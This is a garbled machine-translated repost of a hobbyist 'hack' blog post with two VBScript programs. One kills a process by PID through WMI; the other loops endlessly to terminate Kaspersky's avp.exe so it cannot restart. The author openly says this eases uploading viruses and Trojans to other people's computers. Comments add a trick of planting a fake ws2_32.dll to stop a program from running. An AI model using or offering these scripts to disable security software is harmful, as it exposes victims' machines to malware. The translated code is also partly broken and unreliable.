Use a VBS script to end the process and prevent it from starting.

I have no class this afternoon, and I started to think about some problems in my private space. When browsing VBS-related cases, I wrote two small programs, which are of the Hack nature (in fact, as long as I can "take a knife to kill", what software is no hacker? --!). Kill. vbs is used to end the process in cmd, And Dis. vbs is used to prevent a process from starting again in window mode. Neither of these two VBS will be killed by anti-virus software, and there will be some concealment ...... Check the code! ('As a comment)
Kill. vbs: Copy codeThe Code is as follows: for each ps in getobject _
("Winmgmts :\\\ root \ cimv2: win32_process"). instances _ 'involves WMI script intrusion technology. I cannot explain it clearly!
If ps. handle = wscript. arguments (0) then ', determine whether the PID Number of the process is equal to the obtained PID Number parameter.
Wscript. echo ps. terminate' terminate the process corresponding to the specified PID if they are equal
End if
Next

Dis. vbsCopy codeThe Code is as follows: dim y, x'. Do not use this line ......
Do's an endless loop ...... I am still judging! Do... loop is the loop body!
Set y = getobject ("winmgmts: \ root \ cimv2") 'is the same as described above. This involves Microsoft's WMI Technology!
Set x=y.exe cquery ("select * from win32_process where name1_'avp.exe '")
'Query the sentence, and check if wheresuffix avp.exe (Kabbah) exists in the process!
'In this way, when Kabbah is terminated by Kill. vbs above, it will no longer start. Unless Dis. vbs is ended first ......
For each I in x
I. terminate () 'kabbah will be terminated immediately after it is started ......
Next
Wscript. sleep
Loop

The explanation is clear enough. Let's see how these two vbs work. I put Kill. vbs and Dis. vbs in the C root directory.
Open cmd, enter cd \ to return to the C root directory, enter tasklist to view the processes of the current system, write down the PID of the process you want to kill, and enter cscript Kill. vbs 2200 can end the process with PID 2200! If this process is avp.exe, you can enter Dis. vbs to start Dis. vbs to prevent Kabbah from being started. When dis.vbsis started, only the wscript.exe process item is included in the task manager's process. If the process is not terminated, it cannot start Kabbah again.
Knowing this makes it easier to upload viruses, Trojans, and other things to other people's computers in the future ...... All the above processes have been successfully tested by myself. Continue to improve ......Copy codeThe Code is as follows: ws2_32.dll
This can also be set up in the program directory to organize programs to run.
Greysign-2007-03-20 block.
Ycosxhack-
I'm dizzy! Create a notepad and rename it ws2_32.dll ...... Well, write it down! Haha ......
Greysign-
The running program searches for this interface file in the WINDOWS directory, but searches for the interface file in the program directory first.
Ycosxhack-
Interface file? What do you mean: Any program must look for it? Call this library file? It's really troublesome to delete it ......
Greysign.

Turn: http://hi.baidu.com/ycosxhack/blog/item/779281359f25908aa71e12e9.html